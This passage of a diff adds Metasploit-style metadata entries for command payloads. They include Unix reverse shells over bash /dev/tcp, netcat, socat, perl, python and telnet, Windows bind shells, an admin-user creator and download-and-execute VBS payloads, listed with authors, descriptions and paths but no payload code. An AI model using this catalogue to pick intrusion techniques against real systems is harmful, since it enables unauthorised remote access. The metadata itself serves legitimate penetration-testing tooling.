Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_udp", + "staged": false + }, + "payload_cmd/unix/reverse": { + "name": "Unix Command Shell, Double Reverse TCP (telnet)", + "fullname": "payload/cmd/unix/reverse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through two inbound connections", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_awk": { + "name": "Unix Command Shell, Reverse TCP (via AWK)", + "fullname": "payload/cmd/unix/reverse_awk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "espreto ", + "Ulisses Castro ", + "Gabriel Quadros " + ], + "description": "Creates an interactive shell via GNU AWK", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_awk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash": { + "name": "Unix Command Shell, Reverse TCP (/dev/tcp)", + "fullname": "payload/cmd/unix/reverse_bash", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash_telnet_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (telnet)", + "fullname": "payload/cmd/unix/reverse_bash_telnet_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. 
This module uses the '-z'\n option included on some systems to encrypt using SSL.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash_telnet_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_bash_udp": { + "name": "Unix Command Shell, Reverse UDP (/dev/udp)", + "fullname": "payload/cmd/unix/reverse_bash_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "bcoles " + ], + "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_bash_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_jjs": { + "name": "Unix Command Shell, Reverse TCP (via jjs)", + "fullname": "payload/cmd/unix/reverse_jjs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Connect back and create a command shell via jjs", + "references": [ + 
"URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_jjs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ksh": { + "name": "Unix Command Shell, Reverse TCP (via Ksh)", + "fullname": "payload/cmd/unix/reverse_ksh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Wang Yihang " + ], + "description": "Connect back and create a command shell via Ksh. 
Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ksh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_lua": { + "name": "Unix Command Shell, Reverse TCP (via Lua)", + "fullname": "payload/cmd/unix/reverse_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Creates an interactive shell via Lua", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ncat_ssl": { + "name": "Unix Command Shell, Reverse TCP (via ncat)", + "fullname": "payload/cmd/unix/reverse_ncat_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "C_Sto" + ], + "description": "Creates an interactive shell via ncat, utilizing ssl mode", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ncat_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_netcat": { + "name": "Unix Command Shell, Reverse TCP (via netcat)", + "fullname": "payload/cmd/unix/reverse_netcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "m-1-k-3", + "egypt ", + "juan vazquez " + ], + "description": "Creates an interactive shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_netcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_netcat_gaping": { + "name": "Unix Command Shell, Reverse TCP (via netcat -e)", + "fullname": "payload/cmd/unix/reverse_netcat_gaping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_netcat_gaping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_nodejs": { + "name": "Unix Command Shell, Reverse TCP (via nodejs)", + "fullname": "payload/cmd/unix/reverse_nodejs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Continually listen for a connection and spawn a command shell via nodejs", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_nodejs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_openssl": { + "name": "Unix Command Shell, Double Reverse TCP SSL (openssl)", + "fullname": "payload/cmd/unix/reverse_openssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through two inbound connections", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_openssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_perl": { + "name": "Unix Command Shell, Reverse TCP (via Perl)", + "fullname": "payload/cmd/unix/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"cazz " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_perl_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via perl)", + "fullname": "payload/cmd/unix/reverse_perl_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via perl, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_perl_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_php_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via php)", + "fullname": "payload/cmd/unix/reverse_php_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via php, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 20:39:52 +0000", + "path": 
"/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_php_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_python": { + "name": "Unix Command Shell, Reverse TCP (via Python)", + "fullname": "payload/cmd/unix/reverse_python", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "Connect back and create a command shell via Python", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_python_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/unix/reverse_python_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_python_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, 
+ "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_r": { + "name": "Unix Command Shell, Reverse TCP (via R)", + "fullname": "payload/cmd/unix/reverse_r", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via R", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_r", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ruby": { + "name": "Unix Command Shell, Reverse TCP (via Ruby)", + "fullname": "payload/cmd/unix/reverse_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ruby_ssl": { + "name": "Unix Command Shell, Reverse TCP SSL (via Ruby)", + "fullname": "payload/cmd/unix/reverse_ruby_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and 
create a command shell via Ruby, uses SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ruby_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_sctp": { + "name": "Unix Command Shell, Reverse SCTP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-27 16:21:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_tcp": { + "name": "Unix Command Shell, Reverse TCP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jheysel-r7" + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-09-06 15:52:56 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb", 
+ "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_socat_udp": { + "name": "Unix Command Shell, Reverse UDP (via socat)", + "fullname": "payload/cmd/unix/reverse_socat_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ssh": { + "name": "Unix Command Shell, Reverse TCP SSH", + "fullname": "payload/cmd/unix/reverse_ssh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan ", + "hirura" + ], + "description": "Connect back and create a command shell via SSH", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ssh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ssl_double_telnet": { + "name": "Unix 
Command Shell, Double Reverse TCP SSL (telnet)", + "fullname": "payload/cmd/unix/reverse_ssl_double_telnet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "RageLtMan " + ], + "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ssl_double_telnet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_stub": { + "name": "Unix Command Shell, Reverse TCP (stub)", + "fullname": "payload/cmd/unix/reverse_stub", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through an inbound connection (stub only, no payload)", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_stub", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_tclsh": { + "name": "Unix Command Shell, Reverse TCP (via Tclsh)", + "fullname": "payload/cmd/unix/reverse_tclsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + 
"description": "Creates an interactive shell via Tclsh", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-22 05:49:48 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_tclsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_zsh": { + "name": "Unix Command Shell, Reverse TCP (via Zsh)", + "fullname": "payload/cmd/unix/reverse_zsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Doug Prostko ", + "Wang Yihang " + ], + "description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_zsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/adduser": { + "name": "Windows Execute net user /ADD CMD", + "fullname": "payload/cmd/windows/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "scriptjunkie", + "Chris John Riley" + ], + "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n 
for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/adduser.rb", + "is_install_path": true, + "ref_name": "cmd/windows/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_lua": { + "name": "Windows Command Shell, Bind TCP (via Lua)", + "fullname": "payload/cmd/windows/bind_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Listen for a connection and spawn a command shell via Lua", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_perl": { + "name": "Windows Command Shell, Bind TCP (via Perl)", + "fullname": "payload/cmd/windows/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz ", + "aushack " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_perl_ipv6": { + "name": "Windows Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/cmd/windows/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz ", + "aushack " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_ruby": { + "name": "Windows Command Shell, Bind TCP (via Ruby)", + "fullname": "payload/cmd/windows/bind_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/download_eval_vbs": { + "name": "Windows Executable Download and Evaluate VBS", + "fullname": "payload/cmd/windows/download_eval_vbs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie" + ], + "description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb", + "is_install_path": true, + "ref_name": "cmd/windows/download_eval_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/download_exec_vbs": { + "name": "Windows Executable Download and Execute (via .vbs)", + "fullname": "payload/cmd/windows/download_exec_vbs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie" + ], + "description": "Download an EXE from an HTTP(S) URL and execute it", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb", + "is_install_path": true, + "ref_name": "cmd/windows/download_exec_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/generic": { + "name": 
